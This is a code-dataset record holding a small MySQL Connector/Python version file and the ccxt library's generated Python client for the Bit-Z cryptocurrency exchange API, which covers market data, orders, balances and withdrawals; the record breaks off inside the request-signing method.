"""MySQL Connector/Python version information
The file version.py gets installed and is available after installation
as )_mysql.connector.version.
"""
VERSION = (2, 0, 4, '', 0)
if VERSION[3] and VERSION[4]:
VERSION_TEXT = '{0}.{1}.{2}{3}{4}'.format(*VERSION)
else:
VERSION_TEXT = '{0}.{1}.{2}'.format(*VERSION[0:3])
LICENSE = 'GPLv2 with FOSS License Exception'
EDITION = '' # Added in package names, after the version
| 41.105263 | 78 | 0.744558 |
VERSION = (2, 0, 4, '', 0)
if VERSION[3] and VERSION[4]:
VERSION_TEXT = '{0}.{1}.{2}{3}{4}'.format(*VERSION)
else:
VERSION_TEXT = '{0}.{1}.{2}'.format(*VERSION[0:3])
LICENSE = 'GPLv2 with FOSS License Exception'
EDITION = ''
| true | true |
f72320646603967b7d2c54156d4ac3cb57b612b6 | 50,455 | py | Python | python/ccxt/bitz.py | Huangyi5458/ccxt | 1e01d03dac18633eb73998d7cb279535395368e9 | [
"MIT"
] | 13 | 2020-11-24T12:15:42.000Z | 2022-03-11T00:46:39.000Z | python/ccxt/bitz.py | Huangyi5458/ccxt | 1e01d03dac18633eb73998d7cb279535395368e9 | [
"MIT"
] | null | null | null | python/ccxt/bitz.py | Huangyi5458/ccxt | 1e01d03dac18633eb73998d7cb279535395368e9 | [
"MIT"
] | 1 | 2022-01-01T15:54:52.000Z | 2022-01-01T15:54:52.000Z | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import DDoSProtection
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import OnMaintenance
class bitz(Exchange):
def describe(self):
return self.deep_extend(super(bitz, self).describe(), {
'id': 'bitz',
'name': 'Bit-Z',
'countries': ['HK'],
'rateLimit': 2000,
'version': 'v2',
'userAgent': self.userAgents['chrome'],
'has': {
'cancelOrder': True,
'cancelOrders': True,
'createOrder': True,
'createMarketOrder': False,
'fetchBalance': True,
'fetchDeposits': True,
'fetchClosedOrders': True,
'fetchMarkets': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': True,
'fetchTrades': True,
'fetchTransactions': False,
'fetchWithdrawals': True,
'withdraw': True,
},
'timeframes': {
'1m': '1min',
'5m': '5min',
'15m': '15min',
'30m': '30min',
'1h': '60min',
'4h': '4hour',
'1d': '1day',
'5d': '5day',
'1w': '1week',
'1M': '1mon',
},
'hostname': 'apiv2.bitz.com',
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/87443304-fec5e000-c5fd-11ea-98f8-ba8e67f7eaff.jpg',
'api': {
'market': 'https://{hostname}',
'trade': 'https://{hostname}',
'assets': 'https://{hostname}',
},
'www': 'https://www.bitz.com',
'doc': 'https://apidoc.bitz.com/en/',
'fees': 'https://www.bitz.com/fee?type=1',
'referral': 'https://u.bitz.com/register?invite_code=1429193',
},
'api': {
'market': {
'get': [
'ticker',
'depth',
'order', # trades
'tickerall',
'kline',
'symbolList',
'getServerTime',
'currencyRate',
'currencyCoinRate',
'coinRate',
],
},
'trade': {
'post': [
'addEntrustSheet',
'cancelEntrustSheet',
'cancelAllEntrustSheet',
'coinOut', # withdraw
'getUserHistoryEntrustSheet', # closed orders
'getUserNowEntrustSheet', # open orders
'getEntrustSheetInfo', # order
'depositOrWithdraw', # transactions
],
},
'assets': {
'post': [
'getUserAssets',
],
},
},
'fees': {
'trading': {
'maker': 0.002,
'taker': 0.002,
},
'funding': {
'withdraw': {
'BTC': '0.5%',
'DKKT': '0.5%',
'ETH': 0.01,
'USDT': '0.5%',
'LTC': '0.5%',
'FCT': '0.5%',
'LSK': '0.5%',
'HXI': '0.8%',
'ZEC': '0.5%',
'DOGE': '0.5%',
'MZC': '0.5%',
'ETC': '0.5%',
'GXS': '0.5%',
'XPM': '0.5%',
'PPC': '0.5%',
'BLK': '0.5%',
'XAS': '0.5%',
'HSR': '0.5%',
'NULS': 5.0,
'VOISE': 350.0,
'PAY': 1.5,
'EOS': 0.6,
'YBCT': 35.0,
'OMG': 0.3,
'OTN': 0.4,
'BTX': '0.5%',
'QTUM': '0.5%',
'DASH': '0.5%',
'GAME': '0.5%',
'BCH': '0.5%',
'GNT': 9.0,
'SSS': 1500.0,
'ARK': '0.5%',
'PART': '0.5%',
'LEO': '0.5%',
'DGB': '0.5%',
'ZSC': 130.0,
'VIU': 350.0,
'BTG': '0.5%',
'ARN': 10.0,
'VTC': '0.5%',
'BCD': '0.5%',
'TRX': 200.0,
'HWC': '0.5%',
'UNIT': '0.5%',
'OXY': '0.5%',
'MCO': 0.3500,
'SBTC': '0.5%',
'BCX': '0.5%',
'ETF': '0.5%',
'PYLNT': 0.4000,
'XRB': '0.5%',
'ETP': '0.5%',
},
},
},
'precision': {
'amount': 8,
'price': 8,
},
'options': {
'fetchOHLCVVolume': True,
'fetchOHLCVWarning': True,
'lastNonceTimestamp': 0,
},
'commonCurrencies': {
# https://github.com/ccxt/ccxt/issues/3881
# https://support.bit-z.pro/hc/en-us/articles/360007500654-BOX-BOX-Token-
'BOX': 'BOX Token',
'LEO': 'LeoCoin',
'XRB': 'NANO',
'PXC': 'Pixiecoin',
'VTC': 'VoteCoin',
'TTC': 'TimesChain',
},
'exceptions': {
# '200': Success
'-102': ExchangeError, # Invalid parameter
'-103': AuthenticationError, # Verification failed
'-104': ExchangeNotAvailable, # Network Error-1
'-105': AuthenticationError, # Invalid api signature
'-106': ExchangeNotAvailable, # Network Error-2
'-109': AuthenticationError, # Invalid scretKey
'-110': DDoSProtection, # The number of access requests exceeded
'-111': PermissionDenied, # Current IP is not in the range of trusted IP
'-112': OnMaintenance, # Service is under maintenance
'-114': RateLimitExceeded, # The number of daily requests has reached the limit
'-117': AuthenticationError, # The apikey expires
'-100015': AuthenticationError, # Trade password error
'-100044': ExchangeError, # Fail to request data
'-100101': ExchangeError, # Invalid symbol
'-100201': ExchangeError, # Invalid symbol
'-100301': ExchangeError, # Invalid symbol
'-100401': ExchangeError, # Invalid symbol
'-100302': ExchangeError, # Type of K-line error
'-100303': ExchangeError, # Size of K-line error
'-200003': AuthenticationError, # Please set trade password
'-200005': PermissionDenied, # This account can not trade
'-200025': ExchangeNotAvailable, # Temporary trading halt
'-200027': InvalidOrder, # Price Error
'-200028': InvalidOrder, # Amount must be greater than 0
'-200029': InvalidOrder, # Number must be between %s and %d
'-200030': InvalidOrder, # Over price range
'-200031': InsufficientFunds, # Insufficient assets
'-200032': ExchangeError, # System error. Please contact customer service
'-200033': ExchangeError, # Fail to trade
'-200034': OrderNotFound, # The order does not exist
'-200035': OrderNotFound, # Cancellation error, order filled
'-200037': InvalidOrder, # Trade direction error
'-200038': ExchangeError, # Trading Market Error
'-200055': OrderNotFound, # Order record does not exist
'-300069': AuthenticationError, # api_key is illegal
'-300101': ExchangeError, # Transaction type error
'-300102': InvalidOrder, # Price or number cannot be less than 0
'-300103': AuthenticationError, # Trade password error
'-301001': ExchangeNotAvailable, # Network Error-3
},
})
def fetch_markets(self, params={}):
response = self.marketGetSymbolList(params)
#
# { status: 200,
# msg: "",
# data: { ltc_btc: { id: "1",
# name: "ltc_btc",
# coinFrom: "ltc",
# coinTo: "btc",
# numberFloat: "4",
# priceFloat: "8",
# status: "1",
# minTrade: "0.010",
# maxTrade: "500000000.000"},
# qtum_usdt: { id: "196",
# name: "qtum_usdt",
# coinFrom: "qtum",
# coinTo: "usdt",
# numberFloat: "4",
# priceFloat: "2",
# status: "1",
# minTrade: "0.100",
# maxTrade: "500000000.000"}, },
# time: 1535969146,
# microtime: "0.66955600 1535969146",
# source: "api" }
#
markets = self.safe_value(response, 'data')
ids = list(markets.keys())
result = []
for i in range(0, len(ids)):
id = ids[i]
market = markets[id]
numericId = self.safe_string(market, 'id')
baseId = self.safe_string(market, 'coinFrom')
quoteId = self.safe_string(market, 'coinTo')
base = baseId.upper()
quote = quoteId.upper()
base = self.safe_currency_code(base)
quote = self.safe_currency_code(quote)
symbol = base + '/' + quote
precision = {
'amount': self.safe_integer(market, 'numberFloat'),
'price': self.safe_integer(market, 'priceFloat'),
}
result.append({
'info': market,
'id': id,
'numericId': numericId,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'active': True,
'precision': precision,
'limits': {
'amount': {
'min': self.safe_float(market, 'minTrade'),
'max': self.safe_float(market, 'maxTrade'),
},
'price': {
'min': math.pow(10, -precision['price']),
'max': None,
},
'cost': {
'min': None,
'max': None,
},
},
})
return result
def fetch_balance(self, params={}):
self.load_markets()
response = self.assetsPostGetUserAssets(params)
#
# {
# status: 200,
# msg: "",
# data: {
# cny: 0,
# usd: 0,
# btc_total: 0,
# info: [{
# "name": "zpr",
# "num": "37.49067275",
# "over": "37.49067275",
# "lock": "0.00000000",
# "btc": "0.00000000",
# "usd": "0.00000000",
# "cny": "0.00000000",
# }],
# },
# time: 1535983966,
# microtime: "0.70400500 1535983966",
# source: "api",
# }
#
balances = self.safe_value(response['data'], 'info')
result = {'info': response}
for i in range(0, len(balances)):
balance = balances[i]
currencyId = self.safe_string(balance, 'name')
code = self.safe_currency_code(currencyId)
account = self.account()
account['used'] = self.safe_float(balance, 'lock')
account['total'] = self.safe_float(balance, 'num')
account['free'] = self.safe_float(balance, 'over')
result[code] = account
return self.parse_balance(result)
def parse_ticker(self, ticker, market=None):
#
# { symbol: "eth_btc",
# quoteVolume: "3905.72",
# volume: "97058.21",
# priceChange: "-1.72",
# priceChange24h: "-1.65",
# askPrice: "0.03971272",
# askQty: "0.0663",
# bidPrice: "0.03961469",
# bidQty: "19.5451",
# open: "0.04036769",
# high: "0.04062988",
# low: "0.03956123",
# now: "0.03970100",
# firstId: 115567767,
# lastId: 115795316,
# dealCount: 14078,
# numberPrecision: 4,
# pricePrecision: 8,
# cny: "1959.05",
# usd: "287.10",
# krw: "318655.82" }
#
timestamp = None
marketId = self.safe_string(ticker, 'symbol')
symbol = self.safe_symbol(marketId, market, '_')
last = self.safe_float(ticker, 'now')
open = self.safe_float(ticker, 'open')
change = None
average = None
if last is not None and open is not None:
change = last - open
average = self.sum(last, open) / 2
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_float(ticker, 'high'),
'low': self.safe_float(ticker, 'low'),
'bid': self.safe_float(ticker, 'bidPrice'),
'bidVolume': self.safe_float(ticker, 'bidQty'),
'ask': self.safe_float(ticker, 'askPrice'),
'askVolume': self.safe_float(ticker, 'askQty'),
'vwap': None,
'open': open,
'close': last,
'last': last,
'previousClose': None,
'change': change,
'percentage': self.safe_float(ticker, 'priceChange24h'),
'average': average,
'baseVolume': self.safe_float(ticker, 'volume'),
'quoteVolume': self.safe_float(ticker, 'quoteVolume'),
'info': ticker,
}
def parse_microtime(self, microtime):
if microtime is None:
return microtime
parts = microtime.split(' ')
milliseconds = float(parts[0])
seconds = int(parts[1])
total = self.sum(seconds, milliseconds)
return int(total * 1000)
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = self.marketGetTicker(self.extend(request, params))
#
# { status: 200,
# msg: "",
# data: { symbol: "eth_btc",
# quoteVolume: "3905.72",
# volume: "97058.21",
# priceChange: "-1.72",
# priceChange24h: "-1.65",
# askPrice: "0.03971272",
# askQty: "0.0663",
# bidPrice: "0.03961469",
# bidQty: "19.5451",
# open: "0.04036769",
# high: "0.04062988",
# low: "0.03956123",
# now: "0.03970100",
# firstId: 115567767,
# lastId: 115795316,
# dealCount: 14078,
# numberPrecision: 4,
# pricePrecision: 8,
# cny: "1959.05",
# usd: "287.10",
# krw: "318655.82" },
# time: 1535970397,
# microtime: "0.76341900 1535970397",
# source: "api" }
#
ticker = self.parse_ticker(response['data'], market)
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
return self.extend(ticker, {
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
})
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
request = {}
if symbols is not None:
ids = self.market_ids(symbols)
request['symbols'] = ','.join(ids)
response = self.marketGetTickerall(self.extend(request, params))
#
# { status: 200,
# msg: "",
# data: { ela_btc: { symbol: "ela_btc",
# quoteVolume: "0.00",
# volume: "3.28",
# priceChange: "0.00",
# priceChange24h: "0.00",
# askPrice: "0.00147984",
# askQty: "5.4580",
# bidPrice: "0.00120230",
# bidQty: "12.5384",
# open: "0.00149078",
# high: "0.00149078",
# low: "0.00149078",
# now: "0.00149078",
# firstId: 115581219,
# lastId: 115581219,
# dealCount: 1,
# numberPrecision: 4,
# pricePrecision: 8,
# cny: "73.66",
# usd: "10.79",
# krw: "11995.03" } },
# time: 1535971578,
# microtime: "0.39854200 1535971578",
# source: "api" }
#
tickers = self.safe_value(response, 'data')
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
result = {}
ids = list(tickers.keys())
for i in range(0, len(ids)):
id = ids[i]
ticker = tickers[id]
market = None
if id in self.markets_by_id:
market = self.markets_by_id[id]
ticker = self.parse_ticker(tickers[id], market)
symbol = ticker['symbol']
if symbol is None:
if market is not None:
symbol = market['symbol']
else:
baseId, quoteId = id.split('_')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
if symbol is not None:
result[symbol] = self.extend(ticker, {
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
})
return self.filter_by_array(result, 'symbol', symbols)
def fetch_time(self, params={}):
response = self.marketGetGetServerTime(params)
#
# {
# "status":200,
# "msg":"",
# "data":[],
# "time":1555490875,
# "microtime":"0.35994200 1555490875",
# "source":"api"
# }
#
return self.safe_timestamp(response, 'time')
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
request = {
'symbol': self.market_id(symbol),
}
response = self.marketGetDepth(self.extend(request, params))
#
# { status: 200,
# msg: "",
# data: { asks: [["10.00000000", "0.4426", "4.4260"],
# ["1.00000000", "0.8339", "0.8339"],
# ["0.91700000", "0.0500", "0.0458"],
# ["0.20000000", "0.1000", "0.0200"],
# ["0.03987120", "16.1262", "0.6429"],
# ["0.03986120", "9.7523", "0.3887"] ],
# bids: [["0.03976145", "0.0359", "0.0014"],
# ["0.03973401", "20.9493", "0.8323"],
# ["0.03967970", "0.0328", "0.0013"],
# ["0.00000002", "10000.0000", "0.0002"],
# ["0.00000001", "231840.7500", "0.0023"]],
# coinPair: "eth_btc" },
# time: 1535974778,
# microtime: "0.04017400 1535974778",
# source: "api" }
#
orderbook = self.safe_value(response, 'data')
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
return self.parse_order_book(orderbook, timestamp)
def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# {id: 115807453,
# t: "19:36:24",
# T: 1535974584,
# p: "0.03983296",
# n: "0.1000",
# s: "buy" },
#
id = self.safe_string(trade, 'id')
timestamp = self.safe_timestamp(trade, 'T')
symbol = None
if market is not None:
symbol = market['symbol']
price = self.safe_float(trade, 'p')
amount = self.safe_float(trade, 'n')
cost = None
if price is not None:
if amount is not None:
cost = self.price_to_precision(symbol, amount * price)
side = self.safe_string(trade, 's')
return {
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'id': id,
'order': None,
'type': 'limit',
'side': side,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': None,
'info': trade,
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = self.marketGetOrder(self.extend(request, params))
#
# { status: 200,
# msg: "",
# data: [{id: 115807453,
# t: "19:36:24",
# T: 1535974584,
# p: "0.03983296",
# n: "0.1000",
# s: "buy" },
# {id: 115806811,
# t: "19:33:19",
# T: 1535974399,
# p: "0.03981135",
# n: "9.4612",
# s: "sell" } ],
# time: 1535974583,
# microtime: "0.57118100 1535974583",
# source: "api" }
#
return self.parse_trades(response['data'], market, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
#
# {
# time: "1535973420000",
# open: "0.03975084",
# high: "0.03975084",
# low: "0.03967700",
# close: "0.03967700",
# volume: "12.4733",
# datetime: "2018-09-03 19:17:00"
# }
#
return [
self.safe_integer(ohlcv, 'time'),
self.safe_float(ohlcv, 'open'),
self.safe_float(ohlcv, 'high'),
self.safe_float(ohlcv, 'low'),
self.safe_float(ohlcv, 'close'),
self.safe_float(ohlcv, 'volume'),
]
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
self.load_markets()
duration = self.parse_timeframe(timeframe) * 1000
market = self.market(symbol)
request = {
'symbol': market['id'],
'resolution': self.timeframes[timeframe],
}
if limit is not None:
request['size'] = min(limit, 300) # 1-300
if since is not None:
request['to'] = self.sum(since, limit * duration * 1000)
else:
if since is not None:
raise ArgumentsRequired(self.id + ' fetchOHLCV requires a limit argument if the since argument is specified')
response = self.marketGetKline(self.extend(request, params))
#
# {
# status: 200,
# msg: "",
# data: {
# bars: [
# {time: "1535973420000", open: "0.03975084", high: "0.03975084", low: "0.03967700", close: "0.03967700", volume: "12.4733", datetime: "2018-09-03 19:17:00"},
# {time: "1535955480000", open: "0.04009900", high: "0.04016745", low: "0.04009900", close: "0.04012074", volume: "74.4803", datetime: "2018-09-03 14:18:00"},
# ],
# resolution: "1min",
# symbol: "eth_btc",
# from: "1535973420000",
# to: "1535955480000",
# size: 300
# },
# time: 1535973435,
# microtime: "0.56462100 1535973435",
# source: "api"
# }
#
data = self.safe_value(response, 'data', {})
bars = self.safe_value(data, 'bars', [])
return self.parse_ohlcvs(bars, market, timeframe, since, limit)
def parse_order_status(self, status):
statuses = {
'0': 'open',
'1': 'open', # partially filled
'2': 'closed', # filled
'3': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# createOrder
#
# {
# "id": "693248739", # order id
# "uId": "2074056", # uid
# "price": "100", # price
# "number": "10", # number
# "numberOver": "10", # undealed
# "flag": "sale", # flag
# "status": "0", # unfilled
# "coinFrom": "vtc",
# "coinTo": "dkkt",
# "numberDeal": "0" # dealed
# }
#
id = self.safe_string(order, 'id')
symbol = None
if market is None:
baseId = self.safe_string(order, 'coinFrom')
quoteId = self.safe_string(order, 'coinTo')
if (baseId is not None) and (quoteId is not None):
marketId = baseId + '_' + quoteId
if marketId in self.markets_by_id:
market = self.safe_value(self.markets_by_id, marketId)
else:
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
if market is not None:
symbol = market['symbol']
side = self.safe_string(order, 'flag')
if side is not None:
side = 'sell' if (side == 'sale') else 'buy'
price = self.safe_float(order, 'price')
amount = self.safe_float(order, 'number')
remaining = self.safe_float(order, 'numberOver')
filled = self.safe_float(order, 'numberDeal')
timestamp = self.safe_integer(order, 'timestamp')
if timestamp is None:
timestamp = self.safe_timestamp(order, 'created')
cost = self.safe_float(order, 'orderTotalPrice')
if price is not None:
if filled is not None:
cost = filled * price
status = self.parse_order_status(self.safe_string(order, 'status'))
return {
'id': id,
'clientOrderId': None,
'datetime': self.iso8601(timestamp),
'timestamp': timestamp,
'lastTradeTimestamp': None,
'status': status,
'symbol': symbol,
'type': 'limit',
'side': side,
'price': price,
'cost': cost,
'amount': amount,
'filled': filled,
'remaining': remaining,
'trades': None,
'fee': None,
'info': order,
'average': None,
}
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
if type != 'limit':
raise ExchangeError(self.id + ' createOrder allows limit orders only')
market = self.market(symbol)
orderType = '1' if (side == 'buy') else '2'
if not self.password:
raise ExchangeError(self.id + ' createOrder() requires you to set exchange.password = "YOUR_TRADING_PASSWORD"(a trade password is NOT THE SAME as your login password)')
request = {
'symbol': market['id'],
'type': orderType,
'price': self.price_to_precision(symbol, price),
'number': self.amount_to_precision(symbol, amount),
'tradePwd': self.password,
}
response = self.tradePostAddEntrustSheet(self.extend(request, params))
#
# {
# "status": 200,
# "msg": "",
# "data": {
# "id": "693248739", # order id
# "uId": "2074056", # uid
# "price": "100", # price
# "number": "10", # number
# "numberOver": "10", # undealed
# "flag": "sale", # flag
# "status": "0", # unfilled
# "coinFrom": "vtc",
# "coinTo": "dkkt",
# "numberDeal": "0" # dealed
# },
# "time": "1533035297",
# "microtime": "0.41892000 1533035297",
# "source": "api",
# }
#
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
order = self.extend({
'timestamp': timestamp,
}, response['data'])
return self.parse_order(order, market)
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'entrustSheetId': id,
}
response = self.tradePostCancelEntrustSheet(self.extend(request, params))
#
# {
# "status":200,
# "msg":"",
# "data":{
# "updateAssetsData":{
# "coin":"bz",
# "over":"1000.00000000",
# "lock":"-1000.00000000"
# },
# "assetsInfo":{
# "coin":"bz",
# "over":"9999.99999999",
# "lock":"9999.99999999"
# }
# },
# "time":"1535464383",
# "microtime":"0.91558000 1535464383",
# "source":"api"
# }
#
return response
def cancel_orders(self, ids, symbol=None, params={}):
self.load_markets()
request = {
'ids': ','.join(ids),
}
response = self.tradePostCancelEntrustSheet(self.extend(request, params))
#
# {
# "status":200,
# "msg":"",
# "data":{
# "744173808":{
# "updateAssetsData":{
# "coin":"bz",
# "over":"100.00000000",
# "lock":"-100.00000000"
# },
# "assetsInfo":{
# "coin":"bz",
# "over":"899.99999999",
# "lock":"19099.99999999"
# }
# },
# "744173809":{
# "updateAssetsData":{
# "coin":"bz",
# "over":"100.00000000",
# "lock":"-100.00000000"
# },
# "assetsInfo":{
# "coin":"bz",
# "over":"999.99999999",
# "lock":"18999.99999999"
# }
# }
# },
# "time":"1535525649",
# "microtime":"0.05009400 1535525649",
# "source":"api"
# }
#
return response
def fetch_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'entrustSheetId': id,
}
response = self.tradePostGetEntrustSheetInfo(self.extend(request, params))
#
# {
# "status":200,
# "msg":"",
# "data":{
# "id":"708279852",
# "uId":"2074056",
# "price":"100.00000000",
# "number":"10.0000",
# "total":"0.00000000",
# "numberOver":"10.0000",
# "numberDeal":"0.0000",
# "flag":"sale",
# "status":"0", #0:unfilled, 1:partial deal, 2:all transactions, 3:already cancelled
# "coinFrom":"bz",
# "coinTo":"usdt",
# "orderTotalPrice":"0",
# "created":"1533279876"
# },
# "time":"1533280294",
# "microtime":"0.36859200 1533280294",
# "source":"api"
# }
#
return self.parse_order(response['data'])
def fetch_orders_with_method(self, method, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOpenOrders requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'coinFrom': market['baseId'],
'coinTo': market['quoteId'],
# 'type': 1, # optional integer, 1 = buy, 2 = sell
# 'page': 1, # optional integer
# 'pageSize': 100, # optional integer, max 100
# 'startTime': 1510235730, # optional integer timestamp in seconds
# 'endTime': 1510235730, # optional integer timestamp in seconds
}
if limit is not None:
request['page'] = 1
request['pageSize'] = limit
if since is not None:
request['startTime'] = int(since / 1000)
# request['endTime'] = int(since / 1000)
response = getattr(self, method)(self.extend(request, params))
#
# {
# "status": 200,
# "msg": "",
# "data": {
# "data": [
# {
# "id": "693248739",
# "uid": "2074056",
# "price": "100.00000000",
# "number": "10.0000",
# "total": "0.00000000",
# "numberOver": "0.0000",
# "numberDeal": "0.0000",
# "flag": "sale",
# "status": "3", # 0:unfilled, 1:partial deal, 2:all transactions, 3:already cancelled
# "isNew": "N",
# "coinFrom": "vtc",
# "coinTo": "dkkt",
# "created": "1533035300",
# },
# {
# "id": "723086996",
# "uid": "2074056",
# "price": "100.00000000",
# "number": "10.0000",
# "total": "0.00000000",
# "numberOver": "0.0000",
# "numberDeal": "0.0000",
# "flag": "sale",
# "status": "3",
# "isNew": "N",
# "coinFrom": "bz",
# "coinTo": "usdt",
# "created": "1533523568",
# },
# ],
# "pageInfo": {
# "limit": "10",
# "offest": "0",
# "current_page": "1",
# "page_size": "10",
# "total_count": "17",
# "page_count": "2",
# }
# },
# "time": "1533279329",
# "microtime": "0.15305300 1533279329",
# "source": "api"
# }
#
orders = self.safe_value(response['data'], 'data', [])
return self.parse_orders(orders, None, since, limit)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_with_method('tradePostGetUserHistoryEntrustSheet', symbol, since, limit, params)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_with_method('tradePostGetUserNowEntrustSheet', symbol, since, limit, params)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_with_method('tradePostGetUserHistoryEntrustSheet', symbol, since, limit, params)
def parse_transaction_status(self, status):
statuses = {
'1': 'pending',
'2': 'pending',
'3': 'pending',
'4': 'ok',
'5': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_transaction(self, transaction, currency=None):
#
# {
# "id": '96275',
# "uid": '2109073',
# "wallet": '0xf4c4141c0127bc37b1d0c409a091920eba13ada7',
# "txid": '0xb7adfa52aa566f9ac112e3c01f77bd91179b19eab12092a9a5a8b33d5086e31d',
# "confirm": '12',
# "number": '0.50000000',
# "status": 4,
# "updated": '1534944168605',
# "addressUrl": 'https://etherscan.io/address/',
# "txidUrl": 'https://etherscan.io/tx/',
# "description": 'Ethereum',
# "coin": 'eth',
# "memo": ''
# }
#
# {
# "id":"397574",
# "uid":"2033056",
# "wallet":"1AG1gZvQAYu3WBvgg7p4BMMghQD2gE693k",
# "txid":"",
# "confirm":"0",
# "number":"1000.00000000",
# "status":1,
# "updated":"0",
# "addressUrl":"http://omniexplorer.info/lookupadd.aspx?address=",
# "txidUrl":"http://omniexplorer.info/lookuptx.aspx?txid=",
# "description":"Tether",
# "coin":"usdt",
# "memo":""
# }
#
# {
# "id":"153606",
# "uid":"2033056",
# "wallet":"1AG1gZvQAYu3WBvgg7p4BMMghQD2gE693k",
# "txid":"aa2b179f84cd6dedafd41845e0fbf7f01e14c0d71ea3140d03d6f5a9ccd93199",
# "confirm":"0",
# "number":"761.11110000",
# "status":4,
# "updated":"1536726133579",
# "addressUrl":"http://omniexplorer.info/lookupadd.aspx?address=",
# "txidUrl":"http://omniexplorer.info/lookuptx.aspx?txid=",
# "description":"Tether",
# "coin":"usdt",
# "memo":""
# }
#
# withdraw
#
# {
# "id":397574,
# "email":"***@email.com",
# "coin":"usdt",
# "network_fee":"",
# "eid":23112
# }
#
timestamp = self.safe_integer(transaction, 'updated')
if timestamp == 0:
timestamp = None
currencyId = self.safe_string(transaction, 'coin')
code = self.safe_currency_code(currencyId, currency)
type = self.safe_string_lower(transaction, 'type')
status = self.parse_transaction_status(self.safe_string(transaction, 'status'))
fee = None
feeCost = self.safe_float(transaction, 'network_fee')
if feeCost is not None:
fee = {
'cost': feeCost,
'code': code,
}
return {
'id': self.safe_string(transaction, 'id'),
'txid': self.safe_string(transaction, 'txid'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'address': self.safe_string(transaction, 'wallet'),
'tag': self.safe_string(transaction, 'memo'),
'type': type,
'amount': self.safe_float(transaction, 'number'),
'currency': code,
'status': status,
'updated': timestamp,
'fee': fee,
'info': transaction,
}
def parse_transactions_by_type(self, type, transactions, code=None, since=None, limit=None):
result = []
for i in range(0, len(transactions)):
transaction = self.parse_transaction(self.extend({
'type': type,
}, transactions[i]))
result.append(transaction)
return self.filter_by_currency_since_limit(result, code, since, limit)
def parse_transaction_type(self, type):
types = {
'deposit': 1,
'withdrawal': 2,
}
return self.safe_integer(types, type, type)
def fetch_deposits(self, code=None, since=None, limit=None, params={}):
return self.fetch_transactions_for_type('deposit', code, since, limit, params)
def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
return self.fetch_transactions_for_type('withdrawal', code, since, limit, params)
def fetch_transactions_for_type(self, type, code=None, since=None, limit=None, params={}):
if code is None:
raise ArgumentsRequired(self.id + ' fetchTransactions() requires a currency `code` argument')
self.load_markets()
currency = self.currency(code)
request = {
'coin': currency['id'],
'type': self.parse_transaction_type(type),
}
if since is not None:
request['startTime'] = int(since / str(1000))
if limit is not None:
request['page'] = 1
request['pageSize'] = limit
response = self.tradePostDepositOrWithdraw(self.extend(request, params))
transactions = self.safe_value(response['data'], 'data', [])
return self.parse_transactions_by_type(type, transactions, code, since, limit)
def withdraw(self, code, amount, address, tag=None, params={}):
self.check_address(address)
self.load_markets()
currency = self.currency(code)
request = {
'coin': currency['id'],
'number': self.currency_to_precision(code, amount),
'address': address,
# 'type': 'erc20', # omni, trc20, optional
}
if tag is not None:
request['memo'] = tag
response = self.tradePostCoinOut(self.extend(request, params))
#
# {
# "status":200,
# "msg":"",
# "data":{
# "id":397574,
# "email":"***@email.com",
# "coin":"usdt",
# "network_fee":"",
# "eid":23112
# },
# "time":1552641646,
# "microtime":"0.70304500 1552641646",
# "source":"api"
# }
#
data = self.safe_value(response, 'data', {})
return self.parse_transaction(data, currency)
def nonce(self):
currentTimestamp = self.seconds()
if currentTimestamp > self.options['lastNonceTimestamp']:
self.options['lastNonceTimestamp'] = currentTimestamp
self.options['lastNonce'] = 100000
self.options['lastNonce'] = self.sum(self.options['lastNonce'], 1)
return self.options['lastNonce']
def sign(self, path, api='market', method='GET', params={}, headers=None, body=None):
